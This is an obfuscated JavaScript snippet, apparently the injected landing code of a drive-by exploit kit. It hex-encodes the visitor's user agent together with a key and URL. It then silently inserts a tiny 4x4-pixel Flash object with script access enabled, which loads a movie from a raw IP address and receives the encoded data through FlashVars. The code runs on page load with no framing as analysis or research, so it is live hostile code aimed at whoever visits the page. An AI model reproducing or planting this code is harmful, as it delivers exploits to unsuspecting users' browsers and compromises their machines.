/*s89951d32545hssfj25878fs*/function hgfgerdfgdf(num, width){/*s14295d17931hfj69900fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s97480d80142hfj4593fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s66075d47762hfj93966fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s61796d24899hfj78753fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd44805hfs*/c += b + d;/*s54280d53642hfj74719fs*/e += 1;}return c;}/*s5574dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://185.158.154.3/?MTAwMDQ4NjA1&pa=xXzQMvWebRXQCJ3EKvncT6NEMVHRH0CL2YydmrHQefjaelWkzrLFTF_yozKASASG6_FtdfJRDQ&ma=HkjEOFeAc3lI9cUQsQ9qj9j0CEyEOdh8GC_BTZNwgT-MeXFudq2g-mx7AkeMomwR-C6FETi-hL&gift=MzkzOTQ0MDY=", ghnvbn("http://185.158.154.3/?MTA2NTEwMDI4&ma=jmYxbV1sQoaimj0PWmBSfgZXR_BTcYAgQ-JDDFLA6jFyjmbMTJcolkRfTu2MDxOstW1gY4gsUm6z7S6OJrg&pa=xHzQMrPYbR7FFYPfKPrEUKREMU7WA0SKwY-Zha_VF5yxFDfGpbH1FxzspV-dCF-EmvFvdLAHIwGh1UTASwR&work=MzgxMzQ0Njk=","wexykukusw"));